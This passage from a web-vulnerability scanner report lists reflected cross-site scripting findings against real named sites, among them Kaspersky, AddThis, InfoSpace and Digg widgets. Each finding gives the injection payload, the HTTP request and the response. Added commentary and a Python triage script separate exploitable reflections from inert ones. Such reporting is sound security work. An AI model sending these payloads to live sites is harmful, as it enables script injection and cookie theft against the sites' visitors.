4.67. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9a74"-alert(1)-"ec10ab2148f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_1.csse9a74"-alert(1)-"ec10ab2148f?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:40 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045240"
Content-Type: text/html; charset=utf-8
Content-Length: 31837
Date: Sun, 17 Apr 2011 13:00:42 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
me = s.prop4;
s.eVar44 = s.pageName;
s.hier1 = s.pageName;
s.channel = s.prop1;
s.server=location.hostname;
s.pageName="404:http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.csse9a74"-alert(1)-"ec10ab2148f?D";

/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

4.68. http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://usa.kaspersky.com
Path:   /sites/usa.kaspersky.com/files/css_injector_1.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c50a"><script>alert(1)</script>d5b800973fa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/usa.kaspersky.com/files/css_injector_1.css5c50a"><script>alert(1)</script>d5b800973fa?D HTTP/1.1
Host: usa.kaspersky.com
Proxy-Connection: keep-alive
Referer: http://usa.kaspersky.com/downloads
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __utmz=205612169.1303044891.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=205612169.1347096201.1303044891.1303044891.1303044891.1; __utmc=205612169; __utmb=205612169.1.10.1303044891; evar7=kav_rescue_10.iso; s_nr=1303045169558-New; s_sq=kasperskycomdev%3D%2526pid%253DDownloads%252520%25253E%252520Free%252520Virus%252520Scan%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.kaspersky.com%25252Ftrials%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=21600
Last-Modified: Sun, 17 Apr 2011 13:00:35 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1303045235"
Content-Type: text/html; charset=utf-8
Content-Length: 30565
Date: Sun, 17 Apr 2011 13:00:37 GMT
Connection: keep-alive
X-VC: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
<link rel="canonical" href="http://usa.kaspersky.com/sites/usa.kaspersky.com/files/css_injector_1.css5c50a"><script>alert(1)</script>d5b800973fa?D" />
...[SNIP]...

4.69. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the application's response. The payload a56ed<script>alert(1)</script>7b64c0d8f47 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

The scanner's template describes the sink as plain text between tags, but the response below is served with Content-Type: text/javascript and the value lands inside a single-quoted JavaScript string literal in the mboxFactories.get(...) call. A <script> tag inside a string literal of a script response is inert, so this probe shows an unencoded reflection rather than confirmed script execution. To run code here the reflected value would have to close the single-quoted literal with a ' character, which this probe does not attempt; the finding should be re-tested with a quote-breakout payload before it is rated High.

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrapa56ed<script>alert(1)</script>7b64c0d8f47&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39&mboxXDomainCheck=true HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1303044923199-20205; mboxPC=1303044923199-20205.17

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:00 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 229
Date: Sun, 17 Apr 2011 12:57:59 GMT
Server: Test & Target

mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrapa56ed<script>alert(1)</script>7b64c0d8f47',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303044923199-20205.17");

4.70. http://webroot.tt.omtrdc.net/m2/webroot/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://webroot.tt.omtrdc.net
Path:   /m2/webroot/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the application's response. The payload 44d8b<script>alert(1)</script>66a3b0ec8df was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

As in 4.69, the reflection is into a single-quoted JavaScript string literal in a text/javascript response, not into HTML text between tags, so the <script> payload does not execute as echoed; the same quote-breakout re-test applies. This variant differs only in that the request omits the cookies and the mboxXDomainCheck parameter, and the reflection appears after a redirect.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /m2/webroot/mbox/standard?mboxHost=www.webroot.com&mboxSession=1303044923199-20205&mboxPage=1303044923199-20205&screenHeight=1200&screenWidth=1920&browserWidth=1079&browserHeight=1016&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=US-land-ss-promo-freescan-pagewrap44d8b<script>alert(1)</script>66a3b0ec8df&mboxId=0&mboxTime=1303026923509&mboxURL=http%3A%2F%2Fwww.webroot.com%2FEn_US%2Fland-ss-promo-freescan.html&mboxReferrer=&mboxVersion=39 HTTP/1.1
Host: webroot.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.webroot.com/En_US/land-ss-promo-freescan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1303044923199-20205.17; Domain=webroot.tt.omtrdc.net; Expires=Mon, 17-Oct-2011 12:58:28 GMT; Path=/m2/webroot
Content-Type: text/javascript
Content-Length: 229
Date: Sun, 17 Apr 2011 12:58:28 GMT
Server: Test & Target

mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrap44d8b<script>alert(1)</script>66a3b0ec8df',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1303044923199-20205.17");

4.71. http://widgets.digg.com/buttons/count [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.digg.com
Path:   /buttons/count

Issue detail

The value of the url request parameter is copied into the application's response. The payload 26212<script>alert(1)</script>78fde6bcdfc was submitted in the url parameter. This input was echoed unmodified in the application's response.

The response is a JSONP callback (__DBW.collectDiggs({...})) served as Content-Type: application/json, and the value is reflected inside a double-quoted JSON string. The payload contains no " character, so it does not leave the string, and a <script> tag inside a JSON string value does not execute when the response is loaded as a script. Whether this becomes cross-site scripting depends on how the Digg widget that consumes the url field writes it into the DOM, which this report does not show. Note also that the reflected url value is the local file path of the page the crawl was started from (file:///C:/Users/crawler/...), not a site URL.

Request

GET /buttons/count?url=file%3A///C%3A/Users/crawler/Documents/xss-dork-lawyers-cross-site-scripting-poc-example-report.html26212<script>alert(1)</script>78fde6bcdfc HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cm.BNlU3ABZHXPpB8PFLJNsjdDI.BZHXPpHWhprofile=1302162943; d=fefe6614082a299e480fa82a030f6b9ca66e5879ab6cfb62ab4c68eb320e6b6d; s_vi=[CS]v1|26CEB6F6850116A7-40000108E0006B5B[CE]; s_nr=1302162936988; traffic_control=-781655937076166248%3A200; s_vnum=1304754922563%26vn%3D2

Response

HTTP/1.1 200 OK
Age: 0
Date: Sat, 16 Apr 2011 15:38:08 GMT
Via: NS-CACHE: 100
Etag: "9858d7c55d55811a51331e91c7debbf68dbde3df"
Content-Length: 181
Server: TornadoServer/0.1
Content-Type: application/json
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Sat, 16 Apr 2011 15:48:07 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///C:/Users/crawler/Documents/xss-dork-lawyers-cross-site-scripting-poc-example-report.html26212<script>alert(1)</script>78fde6bcdfc", "diggs": 0});

4.72. http://wsdsapi.infospace.com/infomaster/widgets [qkwid1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the qkwid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 405e1'%3balert(1)//58d1fc3843d was submitted in the qkwid1 parameter. This input was echoed as 405e1';alert(1)//58d1fc3843d in the application's response: the server URL-decodes %3b to ;, so the ' closes the string literal, ; ends the statement, alert(1) runs, and // comments out the remainder of the line. The value is reflected twice, in the txtElements array and again as the argument of document.getElementById('...'), so both sinks need encoding.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw405e1'%3balert(1)//58d1fc3843d&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/?9857d%22-alert(document.cookie)-%221634c822576=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 17 Apr 2011 14:28:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=cynPrBfSr6wOq0-qFaDs_K4AWxqbjFJYfMS4ue0Nu3EP7nbZjaWwwZQN4J4zs6cmIsld-_j2aIhk2g_1P2mafnr5hwE3zhwrC5fvIRJD0aAv6AUF6DKooFdV1RipdQgWbTW1aHTXUBHzJ0PZclM3hHqED5tp5xHkXgVnw3krlBW8btsG0; expires=Tue, 12-Mar-2013 01:08:05 GMT; path=/
Set-Cookie: ASP.NET_SessionId=v2zs5o455vktcdj4vlohjj3d; path=/
Set-Cookie: DomainSession=TransactionId=ea2c97e5d3dd40deb9005d11cdfccb01&SessionId=81862bbe4e154ba7974b5d11cdfccb01&ActionId=22cdec59af59446cbb715d11cdfccb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Sun, 17-Apr-2011 14:48:05 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=979777e4d1ef4fecb1535d11cdfccb01&LastSeenDateTime=4/17/2011 2:28:05 PM&IssueDateTime=4/17/2011 2:28:05 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Tue, 24-Mar-2111 14:28:05 GMT; path=/
Cache-Control: public
Expires: Sun, 17 Apr 2011 15:28:05 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 11855


                                   // variable contructors
var txtElements = [{txt:'qkw405e1';alert(1)//58d1fc3843d',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw405e1';alert(1)//58d1fc3843d');input1.setAttribute('autocomplete','off');

function JSONscr
...[SNIP]...

4.73. http://wsdsapi.infospace.com/infomaster/widgets [submitid1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The value of the submitid1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1889f'%3balert(1)//4c7b192af5d was submitted in the submitid1 parameter. This input was echoed as 1889f';alert(1)//4c7b192af5d in the application's response, with %3b URL-decoded to ; as in 4.72; here the single reflection is the btn property of the txtElements array.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw1889f'%3balert(1)//4c7b192af5d HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/?9857d%22-alert(document.cookie)-%221634c822576=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sun, 17 Apr 2011 14:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=TblQjB3Kf3UeeA8Ddb6tIlxgfpinUzJcOoyXqCmtv1TGOwEwyN_iY0q2oOZmFvHwVcLj_9vunW8iA59R2Sa7AYvXBTDPrp6g4DYLuKzWKhalNt7QbNTj7ebK8lT6iy-4FgDmbSisXR4oP_ROlYIU_2ldcw0PSnA1nGJNabFUsw0smt020; expires=Tue, 12-Mar-2013 01:08:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=i3yvohbjrhxfuv2idjlidwe1; path=/
Set-Cookie: DomainSession=TransactionId=3755bccb16cf4086b6a55d11cdfccb01&SessionId=6aec8e48eda34c8a81885d11cdfccb01&ActionId=17685e97d218424cbffc5d11cdfccb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Sun, 17-Apr-2011 14:48:06 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=22769300428a417aa0da5d11cdfccb01&LastSeenDateTime=4/17/2011 2:28:06 PM&IssueDateTime=4/17/2011 2:28:06 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Tue, 24-Mar-2111 14:28:06 GMT; path=/
Cache-Control: public
Expires: Sun, 17 Apr 2011 15:28:06 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent
Content-Length: 11831


                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkw1889f';alert(1)//4c7b192af5d'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribute('autocomplete','off');

function JSONscriptRequest(fullUrl, query) {
// RE
...[SNIP]...
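Findings 4.69 to 4.73 are all reported with the same Severity and Confidence, yet the responses differ in a way that decides exploitability: in 4.69 to 4.71 the probe sits inside a quoted string of a text/javascript or application/json body and contains no closing quote, whereas 4.72 and 4.73 inject a ' that ends the literal, and 4.64 ends the whole <script> block. The triage function below is an added example, not part of this report or of the scanner that produced it; it reproduces that distinction over sample bodies constructed from the response excerpts above. The <script> openers around the infospace and Kaspersky samples are assumed, since the report's excerpts begin after them, and the Digg file path is shortened.

```python
import re

HTML_TYPES = ("text/html", "application/xhtml+xml")


def _open_js_quote(js: str):
    """Walk JavaScript source and return the quote character of a string
    literal still open at the end of js, or None. Only backslash escapes
    are modelled; comments and regex literals are not, which is enough for
    the one-line sinks quoted in this report but not for arbitrary scripts."""
    quote = None
    i = 0
    while i < len(js):
        c = js[i]
        if quote is None:
            if c in "'\"`":
                quote = c
        elif c == "\\":
            i += 1                      # skip the escaped character
        elif c == quote:
            quote = None
        i += 1
    return quote


def _script_prefix(body: str, idx: int, is_html: bool):
    """Script text preceding position idx within the script that contains
    it; None when idx lies in HTML markup rather than inside a <script>."""
    if not is_html:
        return body[:idx]               # the whole response is script or JSON
    opener = None
    for m in re.finditer(r"<script\b[^>]*>", body[:idx], re.I):
        opener = m                      # keep the last opener before idx
    if opener is None:
        return None
    js = body[opener.end():idx]
    if re.search(r"</script", js, re.I):
        return None                     # that block closed before idx
    return js


def triage(content_type: str, body: str, payload: str) -> str:
    """Classify where a reflected probe landed and whether it left its
    enclosing string. Verdicts: not-reflected, html-markup, js-code,
    js-string-breakout, script-terminator, js-string-inert."""
    mime = content_type.split(";")[0].strip().lower()
    is_html = mime in HTML_TYPES
    idx = body.find(payload)
    if idx < 0:
        return "not-reflected"
    js = _script_prefix(body, idx, is_html)
    if js is None:
        return "html-markup"            # attribute or text sink; HTML encoding decides it
    quote = _open_js_quote(js)
    if quote is None:
        return "js-code"                # lands directly in code and runs as written
    if quote in payload:
        return "js-string-breakout"     # 4.72/4.73: the ' ends the literal
    if is_html and re.search(r"</script", payload, re.I):
        return "script-terminator"      # 4.64: the HTML parser ends the block first
    return "js-string-inert"            # 4.69-4.71: stays a string, nothing runs


# Constructed sample bodies, trimmed from the response excerpts in this report.
TT_BODY = ("mboxFactories.get('default').get('US-land-ss-promo-freescan-pagewrap"
           "a56ed<script>alert(1)</script>7b64c0d8f47',0).setOffer(new mboxOfferDefault()).loaded();")
TT_PAYLOAD = "a56ed<script>alert(1)</script>7b64c0d8f47"

DIGG_BODY = ('__DBW.collectDiggs({"url": "file:///C:/Users/crawler/Documents/report.html'
             '26212<script>alert(1)</script>78fde6bcdfc", "diggs": 0});')
DIGG_PAYLOAD = "26212<script>alert(1)</script>78fde6bcdfc"

# The <script> openers below are assumed; the report's excerpts begin after them.
INFO_BODY = ('<html><head><script type="text/javascript">\n// variable contructors\n'
             "var txtElements = [{txt:'qkw405e1';alert(1)//58d1fc3843d',btn:'sqkw'}];\n"
             "</script></head></html>")
INFO_PAYLOAD = "405e1';alert(1)//58d1fc3843d"

KAV_BODY = ('<html><head><script type="text/javascript">\ns.server=location.hostname;\n'
            's.pageName="404:http://usa.kaspersky.com/sites/default/files/'
            '61fec</script><script>alert(1)</script>a37e498334b";\n</script></head></html>')
KAV_PAYLOAD = "61fec</script><script>alert(1)</script>a37e498334b"

CANON_BODY = ('<html><head><link rel="canonical" href="http://usa.kaspersky.com/sites/'
              'a6ac6"><script>alert(1)</script>480844bb7c3/files/css_injector_1.css?D" />'
              "</head></html>")
CANON_PAYLOAD = 'a6ac6"><script>alert(1)</script>480844bb7c3'

if __name__ == "__main__":
    for label, ctype, body, probe in (
            ("4.69 omtrdc", "text/javascript", TT_BODY, TT_PAYLOAD),
            ("4.71 digg", "application/json", DIGG_BODY, DIGG_PAYLOAD),
            ("4.72 infospace", "text/html; charset=utf-8", INFO_BODY, INFO_PAYLOAD),
            ("4.64 kaspersky", "text/html; charset=utf-8", KAV_BODY, KAV_PAYLOAD),
            ("4.66 kaspersky", "text/html; charset=utf-8", CANON_BODY, CANON_PAYLOAD)):
        print(f"{label:16s} {triage(ctype, body, probe)}")
```

The verdicts are a first pass for ranking scanner output, not proof: js-string-inert means the probe as sent cannot run, and the parameter still needs a second probe containing the enclosing quote character before it is closed as a false positive.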

4.74. http://www.100zakladok.ru/save/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.100zakladok.ru
Path:   /save/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60141"><script>alert(1)</script>9b64324f456 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /save/?60141"><script>alert(1)</script>9b64324f456=1 HTTP/1.1
Host: www.100zakladok.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:38 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=windows-1251
Content-Length: 8732

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>100zakladok.ru - .......... ...... ... ........ ..... ........-........</tit
...[SNIP]...
<a href="/save/?60141"><script>alert(1)</script>9b64324f456=1">
...[SNIP]...

4.75. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91a11<script>alert(1)</script>451b4735667 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php91a11<script>alert(1)</script>451b4735667 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:20:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=1hv6ufnjamb9mds53gfocv6570; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1378
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php91a11<script>alert(1)</script>451b4735667</strong>
...[SNIP]...

4.76. http://www.addthis.com/bookmark.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21282"-alert(1)-"db41275acf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php21282"-alert(1)-"db41275acf8 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 17 Apr 2011 14:20:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=mhkqrnaugp5kh6nhs0b28hgum2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1352
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php21282"-alert(1)-"db41275acf8";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

4.77. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1af27"-alert(1)-"3d4039de95d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

In the request shown the payload actually travels as an extra path segment after /bookmark.php (PHP path info) rather than as a query-string parameter name: the page builds the var u = "..." value it passes to gaPageTracker._trackPageview(u) from the raw request path. Unlike 4.75 and 4.76, this variant returns 200 with the full bookmark page rather than the 404 template, so the injected script runs on a page a victim would plausibly be sent to.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php/1af27"-alert(1)-"3d4039de95d HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:20:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93891

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/1af27"-alert(1)-"3d4039de95d";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

4.78. http://www.aerosocial.com/user_share.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aerosocial.com
Path:   /user_share.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8bd0"><img%20src%3da%20onerror%3dalert(1)>464ed54e568 was submitted in the REST URL parameter 1. This input was echoed as a8bd0"><img src=a onerror=alert(1)>464ed54e568 in the application's response, the server having URL-decoded %20 and %3d.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The sink is the onchange handler of the language <select>, where the requested script name is built into a window.location.href assignment; the " in the payload closes the onchange attribute and the > closes the tag, after which the PoC uses an img onerror event handler, rather than a <script> element, to run the JavaScript.

Request

GET /user_share.phpa8bd0"><img%20src%3da%20onerror%3dalert(1)>464ed54e568 HTTP/1.1
Host: www.aerosocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
